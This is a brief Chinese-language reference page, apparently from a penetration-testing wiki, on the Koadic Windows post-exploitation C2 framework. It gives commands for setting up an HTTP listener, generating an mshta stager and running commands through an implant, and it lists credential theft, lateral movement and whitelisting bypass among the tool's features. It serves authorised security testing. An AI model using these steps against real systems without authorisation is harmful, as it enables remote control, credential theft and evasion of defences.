---
title: "Koadic"
weight: 80
description: "Windows 后渗透工具，轻量级 C2 框架"
date: "2026-03-24T16:29:46+08:00"
lastmod: "2026-03-24T16:29:46+08:00"
---

## Koadic

Koadic 是一款轻量级的 Windows 后渗透工具，基于 JScript/VBScript，无需 PowerShell 即可执行。

## 基础使用

### 启动 Koadic
```bash
./koadic
```

### 创建 Listener
```bash
use listener/http
set Host x.x.x.x
set Port 8080
run
```

### 生成 Payload
```bash
use stager/js/mshta
set Listener http
generate
```

### 执行命令
```bash
use implant/manage/exec_cmd
set Command "whoami"
run
```

## 功能特性

- **JScript/VBScript** - 不依赖 PowerShell
- **轻量级** - 简单易用
- **多种 Stager** - 支持多种初始访问方式
- **模块化** - 丰富的功能模块

## 主要模块

- **权限提升** - 本地提权
- **凭证窃取** - 密码提取
- **网络侦察** - 系统信息收集
- **横向移动** - 内网渗透

## 技术特点

- 基于 Windows 脚本宿主
- 绕过应用白名单
- 低检测率
- 适合老旧系统

## 参考资源

- [Koadic GitHub](https://github.com/zerosum0x0/koadic)